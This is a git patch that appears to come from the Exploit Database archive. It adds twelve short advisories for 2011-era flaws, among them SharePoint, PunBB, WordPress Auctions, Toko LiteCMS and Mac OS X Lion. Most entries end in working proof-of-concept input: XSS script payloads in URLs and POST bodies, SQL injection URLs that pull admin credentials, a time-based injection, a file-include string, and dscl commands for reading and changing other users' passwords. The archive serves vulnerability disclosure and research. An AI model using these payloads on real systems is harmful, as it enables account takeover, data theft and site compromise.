From 62f8955407902efc856dfd3ced44b8eab7683b3e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 22 Feb 2015 08:37:11 +0000 Subject: [PATCH] Update: 2015-02-22 12 new exploits --- files.csv | 12 ++++++++ platforms/asp/webapps/36133.txt | 9 ++++++ platforms/asp/webapps/36134.txt | 12 ++++++++ platforms/asp/webapps/36138.txt | 9 ++++++ platforms/asp/webapps/36139.txt | 19 ++++++++++++ platforms/asp/webapps/36141.txt | 9 ++++++ platforms/osx/local/36143.txt | 9 ++++++ platforms/php/webapps/36135.txt | 9 ++++++ platforms/php/webapps/36136.txt | 9 ++++++ platforms/php/webapps/36137.txt | 36 +++++++++++++++++++++++ platforms/php/webapps/36140.txt | 46 ++++++++++++++++++++++++++++++ platforms/php/webapps/36142.txt | 25 ++++++++++++++++ platforms/windows/remote/36128.txt | 9 ++++++ 13 files changed, 213 insertions(+) create mode 100755 platforms/asp/webapps/36133.txt create mode 100755 platforms/asp/webapps/36134.txt create mode 100755 platforms/asp/webapps/36138.txt create mode 100755 platforms/asp/webapps/36139.txt create mode 100755 platforms/asp/webapps/36141.txt create mode 100755 platforms/osx/local/36143.txt create mode 100755 platforms/php/webapps/36135.txt create mode 100755 platforms/php/webapps/36136.txt create mode 100755 platforms/php/webapps/36137.txt create mode 100755 platforms/php/webapps/36140.txt create mode 100755 platforms/php/webapps/36142.txt create mode 100755 platforms/windows/remote/36128.txt diff --git a/files.csv b/files.csv index 3b616ace4..bc4884195 100755 --- a/files.csv +++ b/files.csv @@ -32555,6 +32555,18 @@ id,file,description,date,author,platform,type,port 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 +36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 +36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0 +36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 +36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0 +36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0 +36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 +36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0 +36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 +36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0 +36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0 diff --git a/platforms/asp/webapps/36133.txt b/platforms/asp/webapps/36133.txt new file mode 100755 index 000000000..62b583d65 --- /dev/null +++ b/platforms/asp/webapps/36133.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49614/info + +Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable. + +http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/36134.txt b/platforms/asp/webapps/36134.txt new file mode 100755 index 000000000..b881017a3 --- /dev/null +++ b/platforms/asp/webapps/36134.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/49620/info + +Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + +Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks. + +The following products are affected; + +Microsoft SharePoint 2007 +Microsoft SharePoint 2010 + +http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/36138.txt b/platforms/asp/webapps/36138.txt new file mode 100755 index 000000000..134f201e8 --- /dev/null +++ b/platforms/asp/webapps/36138.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49667/info + +ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/36139.txt b/platforms/asp/webapps/36139.txt new file mode 100755 index 000000000..c127b5d4b --- /dev/null +++ b/platforms/asp/webapps/36139.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/49668/info + +Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/v1/urundetay.asp?id=21%28%29 + +http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29 + +http://www.example.com/v1/linkler.asp?id=2%28%29 + +http://www.example.com/detay.asp?ilanid=8%28%29 [SQL] + +http://www.example.com/kategoriler.asp?id=4%28%29 [SQL] + +http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL] + +http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/36141.txt b/platforms/asp/webapps/36141.txt new file mode 100755 index 000000000..13686893c --- /dev/null +++ b/platforms/asp/webapps/36141.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49674/info + +Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS] \ No newline at end of file diff --git a/platforms/osx/local/36143.txt b/platforms/osx/local/36143.txt new file mode 100755 index 000000000..766806d60 --- /dev/null +++ b/platforms/osx/local/36143.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49676/info + +Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities. + +Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. + +$ dscl localhost -read /Search/Users/bob + +$ dscl localhost -passwd /Search/Users/ \ No newline at end of file diff --git a/platforms/php/webapps/36135.txt b/platforms/php/webapps/36135.txt new file mode 100755 index 000000000..bac068e35 --- /dev/null +++ b/platforms/php/webapps/36135.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49625/info + +Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable. + +http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 \ No newline at end of file diff --git a/platforms/php/webapps/36136.txt b/platforms/php/webapps/36136.txt new file mode 100755 index 000000000..cf2114e3c --- /dev/null +++ b/platforms/php/webapps/36136.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49650/info + +StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/index.php?language_file=[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/36137.txt b/platforms/php/webapps/36137.txt new file mode 100755 index 000000000..752f81449 --- /dev/null +++ b/platforms/php/webapps/36137.txt @@ -0,0 +1,36 @@ +source: http://www.securityfocus.com/bid/49660/info + +PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +GET +/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script> +GET +/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script> + +POST /delete.php?id=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</ +script> + +POST /edit.php?id=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</ +script> + +POST /login.php?action=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oin +k)</script> + +POST /misc.php?email=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(o +ink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script> + +POST +/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><scri +pt>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script> + +POST /register.php?action=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert +(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'> +<script>alert(oink)</script> diff --git a/platforms/php/webapps/36140.txt b/platforms/php/webapps/36140.txt new file mode 100755 index 000000000..5b05f4067 --- /dev/null +++ b/platforms/php/webapps/36140.txt @@ -0,0 +1,46 @@ +source: http://www.securityfocus.com/bid/49673/info + +Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected. + +Cross Site Scripting Vulnerabilities + + +Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection + + +

+
+' /> +' /> +
+ +

Exploit!



+ + + +HTTP Response Splitting + +==================================================================== +/edit.php: +-------------------------------------------------------------------- + + 3: $charSet = "iso-8859-1"; + 4: $dir = "ltr"; + 5: + 6: if ( isset( $_POST[ "charSet" ] ) ) + 7: { + 8: $charSet = $_POST[ "charSet" ]; + 9: +10: if ( $charSet == "windows-1255" ) +11: { +12: $dir = "rtl"; +13: } +14: } +15: +16: header( "Content-Type: text/html; charset=" . $charSet ); \ No newline at end of file diff --git a/platforms/php/webapps/36142.txt b/platforms/php/webapps/36142.txt new file mode 100755 index 000000000..7e656f1e9 --- /dev/null +++ b/platforms/php/webapps/36142.txt @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/49675/info + +net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following products are affected: + +net4visions iBrowser 1.4.1 Build 10182009 +net4visions iManager 1.2.8 Build 02012008 +net4visions iGallery 1.0.0 + +iBrowser Plugin + +http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir= +http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir= + +iManager Plugin + +http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir= +http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir= + +iGallery Plugin + +http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir= \ No newline at end of file diff --git a/platforms/windows/remote/36128.txt b/platforms/windows/remote/36128.txt new file mode 100755 index 000000000..701c755ad --- /dev/null +++ b/platforms/windows/remote/36128.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/49521/info + +Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files. + +Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. + +Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. + +http://www.exploit-db.com/sploits/36128.pcap \ No newline at end of file